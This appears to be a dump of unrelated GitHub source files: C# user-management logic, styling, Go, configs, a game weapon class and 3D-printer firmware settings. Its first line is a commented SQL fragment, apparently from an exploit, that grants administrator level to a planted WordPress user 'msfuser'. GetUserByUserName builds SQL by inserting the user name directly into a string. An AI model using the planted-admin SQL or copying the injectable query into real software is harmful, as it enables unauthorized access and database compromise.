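#     ((select id from wp_users where user_login='msfuser'), 'wp_user_level', '10');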
{ "pile_set_name": "Github" }
using NBCZ.DAL;
using NBCZ.Model;
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;

namespace NBCZ.BLL
{
    public partial class Pub_UserBLL
    {
        Pub_UserDAL dal = new Pub_UserDAL();

        /// <summary>
        /// Gets the next available user code.
        /// </summary>
        /// <returns></returns>
        public string GetCode()
        {
            var code = "00000001";
            List<Pub_User> users = GetList("", " Id Desc ", 1);
            if (users.Count > 0)
            {
                var model = users.First();
                code = (Convert.ToInt32(model.UserCode.Remove(0, 1)) + 1).ToString().PadLeft(8, '0');
            }
            return code;
        }

        /// <summary>
        /// Changes the stop (soft-delete) status.
        /// </summary>
        /// <param name="where"></param>
        /// <param name="pms"></param>
        /// <returns></returns>
        public bool ChangeSotpStatus(string where, object pms)
        {
            return dal.ChangeSotpStatus(where, pms);
        }

        /// <summary>
        /// Gets a user by user name.
        /// </summary>
        /// <param name="userName"></param>
        /// <returns></returns>
        public Pub_User GetUserByUserName(string userName)
        {
            var dbUser = GetList(string.Format(" StopFlag=0 AND UserName='{0}' ", userName)).FirstOrDefault();
            return dbUser;
        }

        /// <summary>
        /// Changes the password.
        /// </summary>
        /// <param name="userCode"></param>
        /// <param name="pwd"></param>
        /// <returns></returns>
        public bool EditPassWord(string userCode, string pwd)
        {
            return dal.EditPassWord(userCode, pwd);
        }
    }
}
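// Illustrative only (assumes UserCode values have a one-character prefix followed by an
// 8-digit sequence, e.g. "U00000012"): GetCode() strips the prefix from the most recent
// record, increments the number and returns "00000013"; when no users exist it returns
// the default "00000001".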
{ "pile_set_name": "Github" }
// Base Class Definition // ------------------------- .#{$fa-css-prefix} { display: inline-block; font: normal normal normal #{$fa-font-size-base}/#{$fa-line-height-base} FontAwesome; // shortening font declaration font-size: inherit; // can't have font-size inherit on line above, so need to override text-rendering: auto; // optimizelegibility throws things off #1094 -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; }
{ "pile_set_name": "Github" }
namespace Serenity { export enum SummaryType { Disabled = -1, None = 0, Sum = 1, Avg = 2, Min = 3, Max = 4 } }
{ "pile_set_name": "Github" }
// Copyright 2011 Google Inc. All rights reserved. // Use of this source code is governed by the Apache 2.0 // license that can be found in the LICENSE file. package internal import ( "strings" ) func parseFullAppID(appid string) (partition, domain, displayID string) { if i := strings.Index(appid, "~"); i != -1 { partition, appid = appid[:i], appid[i+1:] } if i := strings.Index(appid, ":"); i != -1 { domain, appid = appid[:i], appid[i+1:] } return partition, domain, appid } // appID returns "appid" or "domain.com:appid". func appID(fullAppID string) string { _, dom, dis := parseFullAppID(fullAppID) if dom != "" { return dom + ":" + dis } return dis }
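// Illustrative only (not part of the original file): for a fully qualified app ID of
// the form "partition~domain:displayID",
//
//	parseFullAppID("s~example.com:myapp") // -> "s", "example.com", "myapp"
//	appID("s~example.com:myapp")          // -> "example.com:myapp"
//	appID("myapp")                        // -> "myapp"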
{ "pile_set_name": "Github" }
using System.Linq; using System.Windows.Forms; namespace SimpleTreeMapTests { public partial class Form1 : Form { public Form1() { InitializeComponent(); treeMap1.ObjectNameGetter = o => o.ToString(); treeMap1.ObjectValueGetter = o => (int)o; treeMap1.Populate(new [] {10,9,8,7,6,5,3,3,3,1}.Cast<object>()); } } }
{ "pile_set_name": "Github" }
{ "compilerOptions": { "alwaysStrict": true, "target": "es2017", "module": "commonjs", "declaration": true, "strict": true, "sourceMap": true, "downlevelIteration": true, "importHelpers": true, "noEmitHelpers": true, "incremental": true, "resolveJsonModule": true, "esModuleInterop": true, "declarationDir": "./types", "outDir": "dist/cjs" }, "typedocOptions": { "exclude": "**/node_modules/**", "excludedNotExported": true, "excludePrivate": true, "hideGenerator": true, "ignoreCompilerErrors": true, "mode": "file", "out": "./docs", "plugin": "@aws-sdk/client-documentation-generator" } }
{ "pile_set_name": "Github" }
# universe start date start_date: "2010-01-01" # trading frequency freq: 'W-FRI' # trading stocks tickers: - 'AAPL' - 'GE' - 'JPM' - 'MSFT' - 'VOD' - 'GS' - 'TSLA' - 'MMM' # csv filename csv_file_returns: 'db/returns.csv' csv_file_prices: 'db/prices.csv' # rolling window size window: 20
{ "pile_set_name": "Github" }
# Copyright 1999-2019 Gentoo Authors # Distributed under the terms of the GNU General Public License v2 EAPI=6 inherit autotools DESCRIPTION="Shell history suggest box" HOMEPAGE="https://github.com/dvorka/hstr http://www.mindforger.com" SRC_URI="https://github.com/dvorka/hstr/archive/${PV}.tar.gz -> ${P}.tar.gz" SLOT="0" LICENSE="Apache-2.0" KEYWORDS="amd64 x86" RDEPEND=" sys-libs/ncurses:0=[unicode]" DEPEND=" ${RDEPEND} virtual/pkgconfig" DOCS=( CONFIGURATION.md README.md ) PATCHES=( ${FILESDIR}/${P}-fix-ncurses-configure.patch ) src_prepare() { default sed \ -e 's:-O2::g' \ -i src/Makefile.am || die eautoreconf }
{ "pile_set_name": "Github" }
//------------------------------------------------------------------------------ // <auto-generated> // This code was generated by a tool. // Runtime Version:4.0.30319.42000 // // Changes to this file may cause incorrect behavior and will be lost if // the code is regenerated. // </auto-generated> //------------------------------------------------------------------------------ namespace Alarm.Resx { using System; /// <summary> /// A strongly-typed resource class, for looking up localized strings, etc. /// </summary> // This class was auto-generated by the StronglyTypedResourceBuilder // class via a tool like ResGen or Visual Studio. // To add or remove a member, edit your .ResX file then rerun ResGen // with the /str option, or rebuild your VS project. [global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "15.0.0.0")] [global::System.Diagnostics.DebuggerNonUserCodeAttribute()] [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()] public class AppResources { private static global::System.Resources.ResourceManager resourceMan; private static global::System.Globalization.CultureInfo resourceCulture; [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")] internal AppResources() { } /// <summary> /// Returns the cached ResourceManager instance used by this class. /// </summary> [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)] public static global::System.Resources.ResourceManager ResourceManager { get { if (object.ReferenceEquals(resourceMan, null)) { global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("Alarm.Resx.AppResources", typeof(AppResources).Assembly); resourceMan = temp; } return resourceMan; } } /// <summary> /// Overrides the current thread's CurrentUICulture property for all /// resource lookups using this strongly typed resource class. /// </summary> [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)] public static global::System.Globalization.CultureInfo Culture { get { return resourceCulture; } set { resourceCulture = value; } } /// <summary> /// Looks up a localized string similar to Add. /// </summary> public static string Add { get { return ResourceManager.GetString("Add", resourceCulture); } } /// <summary> /// Looks up a localized string similar to Add alarm. /// </summary> public static string AddAlarm { get { return ResourceManager.GetString("AddAlarm", resourceCulture); } } /// <summary> /// Looks up a localized string similar to after. /// </summary> public static string After { get { return ResourceManager.GetString("After", resourceCulture); } } /// <summary> /// Looks up a localized string similar to Alarm. /// </summary> public static string Alarm { get { return ResourceManager.GetString("Alarm", resourceCulture); } } /// <summary> /// Looks up a localized string similar to Alarm set. /// </summary> public static string AlarmSet { get { return ResourceManager.GetString("AlarmSet", resourceCulture); } } /// <summary> /// Looks up a localized string similar to Dismiss. /// </summary> public static string Dismiss { get { return ResourceManager.GetString("Dismiss", resourceCulture); } } /// <summary> /// Looks up a localized string similar to from now. 
/// </summary> public static string FromNow { get { return ResourceManager.GetString("FromNow", resourceCulture); } } /// <summary> /// Looks up a localized string similar to one hour. /// </summary> public static string Hour { get { return ResourceManager.GetString("Hour", resourceCulture); } } /// <summary> /// Looks up a localized string similar to hours. /// </summary> public static string Hours { get { return ResourceManager.GetString("Hours", resourceCulture); } } /// <summary> /// Looks up a localized string similar to one minute. /// </summary> public static string Minute { get { return ResourceManager.GetString("Minute", resourceCulture); } } /// <summary> /// Looks up a localized string similar to minutes. /// </summary> public static string Minutes { get { return ResourceManager.GetString("Minutes", resourceCulture); } } /// <summary> /// Looks up a localized string similar to now. /// </summary> public static string Now { get { return ResourceManager.GetString("Now", resourceCulture); } } /// <summary> /// Looks up a localized string similar to Set alarm. /// </summary> public static string SetAlarm { get { return ResourceManager.GetString("SetAlarm", resourceCulture); } } } }
{ "pile_set_name": "Github" }
// Copyright 2012 The Go Authors. All rights reserved. // Use of this source code is governed by a BSD-style // license that can be found in the LICENSE file. // Package ipv4 implements IP-level socket options for the Internet // Protocol version 4. // // The package provides IP-level socket options that allow // manipulation of IPv4 facilities. // // The IPv4 protocol and basic host requirements for IPv4 are defined // in RFC 791 and RFC 1122. // Host extensions for multicasting and socket interface extensions // for multicast source filters are defined in RFC 1112 and RFC 3678. // IGMPv1, IGMPv2 and IGMPv3 are defined in RFC 1112, RFC 2236 and RFC // 3376. // Source-specific multicast is defined in RFC 4607. // // // Unicasting // // The options for unicasting are available for net.TCPConn, // net.UDPConn and net.IPConn which are created as network connections // that use the IPv4 transport. When a single TCP connection carrying // a data flow of multiple packets needs to indicate the flow is // important, Conn is used to set the type-of-service field on the // IPv4 header for each packet. // // ln, err := net.Listen("tcp4", "0.0.0.0:1024") // if err != nil { // // error handling // } // defer ln.Close() // for { // c, err := ln.Accept() // if err != nil { // // error handling // } // go func(c net.Conn) { // defer c.Close() // // The outgoing packets will be labeled DiffServ assured forwarding // class 1 low drop precedence, known as AF11 packets. // // if err := ipv4.NewConn(c).SetTOS(0x28); err != nil { // // error handling // } // if _, err := c.Write(data); err != nil { // // error handling // } // }(c) // } // // // Multicasting // // The options for multicasting are available for net.UDPConn and // net.IPconn which are created as network connections that use the // IPv4 transport. A few network facilities must be prepared before // you begin multicasting, at a minimum joining network interfaces and // multicast groups. // // en0, err := net.InterfaceByName("en0") // if err != nil { // // error handling // } // en1, err := net.InterfaceByIndex(911) // if err != nil { // // error handling // } // group := net.IPv4(224, 0, 0, 250) // // First, an application listens to an appropriate address with an // appropriate service port. // // c, err := net.ListenPacket("udp4", "0.0.0.0:1024") // if err != nil { // // error handling // } // defer c.Close() // // Second, the application joins multicast groups, starts listening to // the groups on the specified network interfaces. Note that the // service port for transport layer protocol does not matter with this // operation as joining groups affects only network and link layer // protocols, such as IPv4 and Ethernet. // // p := ipv4.NewPacketConn(c) // if err := p.JoinGroup(en0, &net.UDPAddr{IP: group}); err != nil { // // error handling // } // if err := p.JoinGroup(en1, &net.UDPAddr{IP: group}); err != nil { // // error handling // } // // The application might set per packet control message transmissions // between the protocol stack within the kernel. When the application // needs a destination address on an incoming packet, // SetControlMessage of PacketConn is used to enable control message // transmissions. // // if err := p.SetControlMessage(ipv4.FlagDst, true); err != nil { // // error handling // } // // The application could identify whether the received packets are // of interest by using the control message that contains the // destination address of the received packet. 
// // b := make([]byte, 1500) // for { // n, cm, src, err := p.ReadFrom(b) // if err != nil { // // error handling // } // if cm.Dst.IsMulticast() { // if cm.Dst.Equal(group) { // // joined group, do something // } else { // // unknown group, discard // continue // } // } // // The application can also send both unicast and multicast packets. // // p.SetTOS(0x0) // p.SetTTL(16) // if _, err := p.WriteTo(data, nil, src); err != nil { // // error handling // } // dst := &net.UDPAddr{IP: group, Port: 1024} // for _, ifi := range []*net.Interface{en0, en1} { // if err := p.SetMulticastInterface(ifi); err != nil { // // error handling // } // p.SetMulticastTTL(2) // if _, err := p.WriteTo(data, nil, dst); err != nil { // // error handling // } // } // } // // // More multicasting // // An application that uses PacketConn or RawConn may join multiple // multicast groups. For example, a UDP listener with port 1024 might // join two different groups across over two different network // interfaces by using: // // c, err := net.ListenPacket("udp4", "0.0.0.0:1024") // if err != nil { // // error handling // } // defer c.Close() // p := ipv4.NewPacketConn(c) // if err := p.JoinGroup(en0, &net.UDPAddr{IP: net.IPv4(224, 0, 0, 248)}); err != nil { // // error handling // } // if err := p.JoinGroup(en0, &net.UDPAddr{IP: net.IPv4(224, 0, 0, 249)}); err != nil { // // error handling // } // if err := p.JoinGroup(en1, &net.UDPAddr{IP: net.IPv4(224, 0, 0, 249)}); err != nil { // // error handling // } // // It is possible for multiple UDP listeners that listen on the same // UDP port to join the same multicast group. The net package will // provide a socket that listens to a wildcard address with reusable // UDP port when an appropriate multicast address prefix is passed to // the net.ListenPacket or net.ListenUDP. // // c1, err := net.ListenPacket("udp4", "224.0.0.0:1024") // if err != nil { // // error handling // } // defer c1.Close() // c2, err := net.ListenPacket("udp4", "224.0.0.0:1024") // if err != nil { // // error handling // } // defer c2.Close() // p1 := ipv4.NewPacketConn(c1) // if err := p1.JoinGroup(en0, &net.UDPAddr{IP: net.IPv4(224, 0, 0, 248)}); err != nil { // // error handling // } // p2 := ipv4.NewPacketConn(c2) // if err := p2.JoinGroup(en0, &net.UDPAddr{IP: net.IPv4(224, 0, 0, 248)}); err != nil { // // error handling // } // // Also it is possible for the application to leave or rejoin a // multicast group on the network interface. // // if err := p.LeaveGroup(en0, &net.UDPAddr{IP: net.IPv4(224, 0, 0, 248)}); err != nil { // // error handling // } // if err := p.JoinGroup(en0, &net.UDPAddr{IP: net.IPv4(224, 0, 0, 250)}); err != nil { // // error handling // } // // // Source-specific multicasting // // An application that uses PacketConn or RawConn on IGMPv3 supported // platform is able to join source-specific multicast groups. // The application may use JoinSourceSpecificGroup and // LeaveSourceSpecificGroup for the operation known as "include" mode, // // ssmgroup := net.UDPAddr{IP: net.IPv4(232, 7, 8, 9)} // ssmsource := net.UDPAddr{IP: net.IPv4(192, 168, 0, 1)}) // if err := p.JoinSourceSpecificGroup(en0, &ssmgroup, &ssmsource); err != nil { // // error handling // } // if err := p.LeaveSourceSpecificGroup(en0, &ssmgroup, &ssmsource); err != nil { // // error handling // } // // or JoinGroup, ExcludeSourceSpecificGroup, // IncludeSourceSpecificGroup and LeaveGroup for the operation known // as "exclude" mode. 
// // exclsource := net.UDPAddr{IP: net.IPv4(192, 168, 0, 254)} // if err := p.JoinGroup(en0, &ssmgroup); err != nil { // // error handling // } // if err := p.ExcludeSourceSpecificGroup(en0, &ssmgroup, &exclsource); err != nil { // // error handling // } // if err := p.LeaveGroup(en0, &ssmgroup); err != nil { // // error handling // } // // Note that it depends on each platform implementation what happens // when an application which runs on IGMPv3 unsupported platform uses // JoinSourceSpecificGroup and LeaveSourceSpecificGroup. // In general the platform tries to fall back to conversations using // IGMPv1 or IGMPv2 and starts to listen to multicast traffic. // In the fallback case, ExcludeSourceSpecificGroup and // IncludeSourceSpecificGroup may return an error. package ipv4 // import "golang.org/x/net/ipv4" // BUG(mikio): This package is not implemented on NaCl and Plan 9.
{ "pile_set_name": "Github" }
mtllib dinnerware.mtl usemtl pan_tefal v 0.048268 -0.085308 0.060000 v 0.051940 -0.089963 0.060000 v 0.029150 -0.050489 0.000000 v 0.027560 -0.047735 0.000000 v -0.048765 -0.086152 0.060600 v -0.052459 -0.090862 0.060600 v -0.029442 -0.050994 0.000000 v -0.027836 -0.048213 0.000000 vn 0.404852 0.441710 0.800617 vn -0.882548 -0.029017 0.469326 vn 0.182767 0.981935 0.048984 vn -0.768458 0.392626 -0.505290 vn 0.592713 0.805382 -0.007215 vn 0.400028 0.869068 0.291031 vn -0.642772 0.691166 0.330355 vn 0.104670 0.652086 -0.750885 f 1//1 2//2 4//4 f 1//1 5//5 2//2 f 1//1 6//6 2//2 f 1//1 4//4 5//5 f 1//1 5//5 6//6 f 2//2 3//3 4//4 f 2//2 7//7 3//3 f 2//2 5//5 6//6 f 2//2 6//6 7//7 f 3//3 7//7 4//4 f 3//3 8//8 4//4 f 3//3 7//7 8//8 f 4//4 8//8 5//5 f 4//4 7//7 8//8 f 5//5 8//8 6//6 f 6//6 8//8 7//7
{ "pile_set_name": "Github" }
//======== (C) Copyright 2002 Charles G. Cleveland All rights reserved. ========= // // The copyright to the contents herein is the property of Charles G. Cleveland. // The contents may be used and/or copied only with the written permission of // Charles G. Cleveland, or in accordance with the terms and conditions stipulated in // the agreement/contract under which the contents have been supplied. // // Purpose: This is the weapon that marines use to deploy mines (not the mines themselves) // // $Workfile: AvHMine.cpp $ // $Date: 2002/10/25 21:48:21 $ // //------------------------------------------------------------------------------- // $Log: AvHMine.cpp,v $ // Revision 1.10 2002/10/25 21:48:21 Flayra // - Fixe for wrong player model when holding mines // // Revision 1.9 2002/10/16 20:53:09 Flayra // - Removed weapon upgrade sounds // // Revision 1.8 2002/10/16 01:01:58 Flayra // - Fixed mines being resupplied from armory // // Revision 1.7 2002/10/03 18:46:17 Flayra // - Added heavy view model // // Revision 1.6 2002/07/24 19:09:17 Flayra // - Linux issues // // Revision 1.5 2002/07/24 18:55:52 Flayra // - Linux case sensitivity stuff // // Revision 1.4 2002/07/24 18:45:42 Flayra // - Linux and scripting changes // // Revision 1.3 2002/06/25 17:47:14 Flayra // - Fixed mine, refactored for new disabled/enabled state // // Revision 1.2 2002/06/03 16:37:31 Flayra // - Constants and tweaks to make weapon anims and times correct with new artwork, added different deploy times (this should be refactored a bit more) // // Revision 1.1 2002/05/23 02:33:42 Flayra // - Post-crash checkin. Restored @Backup from around 4/16. Contains changes for last four weeks of development. // //=============================================================================== #include "mod/AvHMarineWeapons.h" #include "mod/AvHPlayer.h" #ifdef AVH_CLIENT #include "cl_dll/eventscripts.h" #include "cl_dll/in_defs.h" #include "cl_dll/wrect.h" #include "cl_dll/cl_dll.h" #endif #include "common/hldm.h" #include "common/event_api.h" #include "common/event_args.h" #include "common/vector_util.h" #include "mod/AvHMarineWeapons.h" #include "mod/AvHMarineEquipmentConstants.h" #ifdef AVH_SERVER #include "mod/AvHGamerules.h" #include "mod/AvHMarineEquipment.h" #include "mod/AvHSharedUtil.h" #include "mod/AvHServerUtil.h" #endif LINK_ENTITY_TO_CLASS(kwMine, AvHMine); void AvHMine::DeductCostForShot(void) { AvHBasePlayerWeapon::DeductCostForShot(); //this->m_pPlayer->m_rgAmmo[m_iPrimaryAmmoType]--; //if(this->m_pPlayer->m_rgAmmo[m_iPrimaryAmmoType] <= 0) if(!this->m_iClip) { // no more mines! RetireWeapon(); } } bool AvHMine::GetCanBeResupplied() const { return false; } int AvHMine::GetDeployAnimation() const { return 2; } char* AvHMine::GetHeavyViewModel() const { return kTripmineHVVModel; } char* AvHMine::GetPlayerModel() const { return kTripminePModel; } char* AvHMine::GetWorldModel() const { return kTripmineWModel; } char* AvHMine::GetViewModel() const { return kTripmineVModel; } int AvHMine::GetShootAnimation() const { // Return deploy animation for now, this should play fire animation, then a little later, play the deploy animation return 2; } void AvHMine::Holster(int skiplocal) { if(!this->m_iClip) { // Out of mines SetThink(&AvHMine::DestroyItem); this->pev->nextthink = gpGlobals->time + 0.1; } AvHMarineWeapon::Holster(skiplocal); } void AvHMine::Init() { this->mRange = kMineRange; this->mDamage = 0; // What to do here? Is it taking damage from CGrenade? 
} bool AvHMine::ProcessValidAttack(void) { bool theSuccess = AvHMarineWeapon::ProcessValidAttack(); // This test is not necessary since the new collision code makes it so // that interpenetrating objects are not a problem. /* if(theSuccess) { #ifdef AVH_SERVER theSuccess = false; Vector theDropLocation; Vector theDropAngles; if(this->GetDropLocation(theDropLocation, &theDropAngles)) { Vector theMineMinSize = Vector (kMineMinSize); Vector theMineMaxSize = Vector (kMineMaxSize); // TODO: Rotate extents by theDropAngles, to test bounding box extents as the mine would be placed if(AvHSHUGetIsAreaFree(theDropLocation, theMineMinSize, theMineMaxSize)) { theSuccess = true; } } #endif } */ #ifdef AVH_SERVER if(theSuccess) { Vector theMineOrigin; Vector theMineAngles; theSuccess = this->GetDropLocation(theMineOrigin, &theMineAngles); } #endif return theSuccess; } #ifdef AVH_SERVER bool AvHMine::GetDropLocation(Vector& outLocation, Vector* outAngles) const { bool theSuccess = false; UTIL_MakeVectors( m_pPlayer->pev->v_angle + m_pPlayer->pev->punchangle ); Vector vecSrc = m_pPlayer->GetGunPosition( ); Vector vecAiming = gpGlobals->v_forward; TraceResult tr; UTIL_TraceLine( vecSrc, vecSrc + vecAiming*this->mRange, dont_ignore_monsters, ENT( m_pPlayer->pev ), &tr ); if (tr.flFraction < 1.0) { CBaseEntity* theEntity = CBaseEntity::Instance( tr.pHit ); // puzl: 981 // Mines can't be planted on players or buildings if (!dynamic_cast<AvHDeployedMine*>(theEntity) && !dynamic_cast<AvHPlayer *>(theEntity) && !dynamic_cast<AvHBaseBuildable *>(theEntity)) { int kOffset = 8; Vector thePotentialOrigin = tr.vecEndPos + tr.vecPlaneNormal * kOffset; BaseEntityListType theEntityList; theEntityList.push_back(theEntity); // Make sure there isn't an entity nearby that this would block theEntity = NULL; const int kMineSearchRadius = 15; while((theEntity = UTIL_FindEntityInSphere(theEntity, thePotentialOrigin, kMineSearchRadius)) != NULL) { theEntityList.push_back(theEntity); } // For the mine placement to be valid, the entity it hit, and all the entities nearby must be valid and non-blocking theSuccess = true; for(BaseEntityListType::iterator theIter = theEntityList.begin(); theIter != theEntityList.end(); theIter++) { // puzl: 225 make sure there are no mines within kMineSearchRadius of each other ( 15 units ) CBaseEntity* theCurrentEntity = *theIter; if(!theCurrentEntity || (theCurrentEntity->pev->flags & FL_CONVEYOR) || AvHSUGetIsExternalClassName(STRING(theCurrentEntity->pev->classname)) || dynamic_cast<CBaseDoor*>(theCurrentEntity) || dynamic_cast<CRotDoor*>(theCurrentEntity) || dynamic_cast<AvHDeployedMine*>(theCurrentEntity) ) { theSuccess = false; break; } } if(theSuccess) { VectorCopy(thePotentialOrigin, outLocation); if(outAngles) { VectorCopy(UTIL_VecToAngles( tr.vecPlaneNormal ), *outAngles) } } } } return theSuccess; } #endif void AvHMine::FireProjectiles(void) { #ifdef AVH_SERVER Vector theMineOrigin; Vector theMineAngles; if(this->GetDropLocation(theMineOrigin, &theMineAngles)) { GetGameRules()->MarkDramaticEvent(kMinePlacePriority, this->m_pPlayer); AvHDeployedMine* theMine = dynamic_cast<AvHDeployedMine*>(CBaseEntity::Create( kwsDeployedMine, theMineOrigin, theMineAngles, m_pPlayer->edict() )); ASSERT(theMine); // Set the team so it doesn't blow us up, remember the owner so proper credit can be given theMine->pev->team = m_pPlayer->pev->team; //theMine->pev->owner = m_pPlayer->edict(); theMine->SetPlacer(this->m_pPlayer->pev); // Set it as a marine item so it gets damage upgrades // Set any team-wide 
upgrades AvHTeam* theTeam = GetGameRules()->GetTeam(AvHTeamNumber(m_pPlayer->pev->team)); ASSERT(theTeam); theMine->pev->iuser4 |= theTeam->GetTeamWideUpgrades(); } #endif } int AvHMine::GetBarrelLength() const { return kMineBarrellLength; } float AvHMine::GetRateOfFire() const { return kMineROF; } bool AvHMine::GetFiresUnderwater() const { return true; } BOOL AvHMine::PlayEmptySound() { // None return 0; } void AvHMine::Precache() { AvHMarineWeapon::Precache(); UTIL_PrecacheOther(kwsDeployedMine); this->mEvent = PRECACHE_EVENT(1, kWeaponAnimationEvent); } bool AvHMine::Resupply() { return false; } void AvHMine::Spawn() { this->Precache(); AvHMarineWeapon::Spawn(); this->m_iId = AVH_WEAPON_MINE; // Set our class name this->pev->classname = MAKE_STRING(kwsMine); SET_MODEL(ENT(pev), kTripmineW2Model); FallInit();// get ready to fall down. int theNumMines = BALANCE_VAR(kMineMaxAmmo); #ifdef AVH_SERVER if(GetGameRules()->GetIsCombatMode()) { theNumMines = BALANCE_VAR(kMineMaxAmmoCombat); } #endif this->m_iDefaultAmmo = theNumMines; } bool AvHMine::UsesAmmo(void) const { return true; } BOOL AvHMine::UseDecrement(void) { return true; }
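// Descriptive note (not part of the original NS source): placement flow, as implemented
// above. ProcessValidAttack() only succeeds when GetDropLocation() finds a spot; that
// helper traces kMineRange units along the view direction, rejects hits on players,
// buildables, doors, conveyors and other mines within kMineSearchRadius, and offsets the
// drop point along the surface normal. FireProjectiles() then spawns a kwsDeployedMine
// there, copying the placer's team and any team-wide upgrades onto it.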
{ "pile_set_name": "Github" }
/** * Marlin 3D Printer Firmware * Copyright (C) 2016 MarlinFirmware [https://github.com/MarlinFirmware/Marlin] * * Based on Sprinter and grbl. * Copyright (C) 2011 Camiel Gubbels / Erik van der Zalm * * This program is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 3 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program. If not, see <http://www.gnu.org/licenses/>. * */ // Example configuration file for OpenBeam Kossel Pro // tested on 2015-05-19 by @Wackerbarth // using Arduino 1.6.5 (Mac) /** * Configuration_adv.h * * Advanced settings. * Only change these if you know exactly what you're doing. * Some of these settings can damage your printer if improperly set! * * Basic settings can be found in Configuration.h * */ #ifndef CONFIGURATION_ADV_H #define CONFIGURATION_ADV_H #define CONFIGURATION_ADV_H_VERSION 010109 // @section temperature //=========================================================================== //=============================Thermal Settings ============================ //=========================================================================== // // Hephestos 2 24V heated bed upgrade kit. // https://store.bq.com/en/heated-bed-kit-hephestos2 // //#define HEPHESTOS2_HEATED_BED_KIT #if ENABLED(HEPHESTOS2_HEATED_BED_KIT) #undef TEMP_SENSOR_BED #define TEMP_SENSOR_BED 70 #define HEATER_BED_INVERTING true #endif #if DISABLED(PIDTEMPBED) #define BED_CHECK_INTERVAL 5000 // ms between checks in bang-bang control #if ENABLED(BED_LIMIT_SWITCHING) #define BED_HYSTERESIS 2 // Only disable heating if T>target+BED_HYSTERESIS and enable heating if T>target-BED_HYSTERESIS #endif #endif /** * Thermal Protection provides additional protection to your printer from damage * and fire. Marlin always includes safe min and max temperature ranges which * protect against a broken or disconnected thermistor wire. * * The issue: If a thermistor falls out, it will report the much lower * temperature of the air in the room, and the the firmware will keep * the heater on. * * The solution: Once the temperature reaches the target, start observing. * If the temperature stays too far below the target (hysteresis) for too * long (period), the firmware will halt the machine as a safety precaution. * * If you get false positives for "Thermal Runaway", increase * THERMAL_PROTECTION_HYSTERESIS and/or THERMAL_PROTECTION_PERIOD */ #if ENABLED(THERMAL_PROTECTION_HOTENDS) #define THERMAL_PROTECTION_PERIOD 40 // Seconds #define THERMAL_PROTECTION_HYSTERESIS 4 // Degrees Celsius /** * Whenever an M104, M109, or M303 increases the target temperature, the * firmware will wait for the WATCH_TEMP_PERIOD to expire. If the temperature * hasn't increased by WATCH_TEMP_INCREASE degrees, the machine is halted and * requires a hard reset. This test restarts with any M104/M109/M303, but only * if the current temperature is far enough below the target for a reliable * test. * * If you get false positives for "Heating failed", increase WATCH_TEMP_PERIOD * and/or decrease WATCH_TEMP_INCREASE. WATCH_TEMP_INCREASE should not be set * below 2. 
*/ #define WATCH_TEMP_PERIOD 20 // Seconds #define WATCH_TEMP_INCREASE 2 // Degrees Celsius #endif /** * Thermal Protection parameters for the bed are just as above for hotends. */ #if ENABLED(THERMAL_PROTECTION_BED) #define THERMAL_PROTECTION_BED_PERIOD 20 // Seconds #define THERMAL_PROTECTION_BED_HYSTERESIS 2 // Degrees Celsius /** * As described above, except for the bed (M140/M190/M303). */ #define WATCH_BED_TEMP_PERIOD 60 // Seconds #define WATCH_BED_TEMP_INCREASE 2 // Degrees Celsius #endif #if ENABLED(PIDTEMP) // this adds an experimental additional term to the heating power, proportional to the extrusion speed. // if Kc is chosen well, the additional required power due to increased melting should be compensated. //#define PID_EXTRUSION_SCALING #if ENABLED(PID_EXTRUSION_SCALING) #define DEFAULT_Kc (100) //heating power=Kc*(e_speed) #define LPQ_MAX_LEN 50 #endif #endif /** * Automatic Temperature: * The hotend target temperature is calculated by all the buffered lines of gcode. * The maximum buffered steps/sec of the extruder motor is called "se". * Start autotemp mode with M109 S<mintemp> B<maxtemp> F<factor> * The target temperature is set to mintemp+factor*se[steps/sec] and is limited by * mintemp and maxtemp. Turn this off by executing M109 without F* * Also, if the temperature is set to a value below mintemp, it will not be changed by autotemp. * On an Ultimaker, some initial testing worked with M109 S215 B260 F1 in the start.gcode */ #define AUTOTEMP #if ENABLED(AUTOTEMP) #define AUTOTEMP_OLDWEIGHT 0.98 #endif // Show extra position information in M114 //#define M114_DETAIL // Show Temperature ADC value // Enable for M105 to include ADC values read from temperature sensors. //#define SHOW_TEMP_ADC_VALUES /** * High Temperature Thermistor Support * * Thermistors able to support high temperature tend to have a hard time getting * good readings at room and lower temperatures. This means HEATER_X_RAW_LO_TEMP * will probably be caught when the heating element first turns on during the * preheating process, which will trigger a min_temp_error as a safety measure * and force stop everything. * To circumvent this limitation, we allow for a preheat time (during which, * min_temp_error won't be triggered) and add a min_temp buffer to handle * aberrant readings. * * If you want to enable this feature for your hotend thermistor(s) * uncomment and set values > 0 in the constants below */ // The number of consecutive low temperature errors that can occur // before a min_temp_error is triggered. (Shouldn't be more than 10.) //#define MAX_CONSECUTIVE_LOW_TEMPERATURE_ERROR_ALLOWED 0 // The number of milliseconds a hotend will preheat before starting to check // the temperature. This value should NOT be set to the time it takes the // hot end to reach the target temperature, but the time it takes to reach // the minimum temperature your thermistor can read. The lower the better/safer. // This shouldn't need to be more than 30 seconds (30000) //#define MILLISECONDS_PREHEAT_TIME 0 // @section extruder // Extruder runout prevention. // If the machine is idle and the temperature over MINTEMP // then extrude some filament every couple of SECONDS. //#define EXTRUDER_RUNOUT_PREVENT #if ENABLED(EXTRUDER_RUNOUT_PREVENT) #define EXTRUDER_RUNOUT_MINTEMP 190 #define EXTRUDER_RUNOUT_SECONDS 30 #define EXTRUDER_RUNOUT_SPEED 1500 // mm/m #define EXTRUDER_RUNOUT_EXTRUDE 5 // mm #endif // @section temperature // Calibration for AD595 / AD8495 sensor to adjust temperature measurements. 
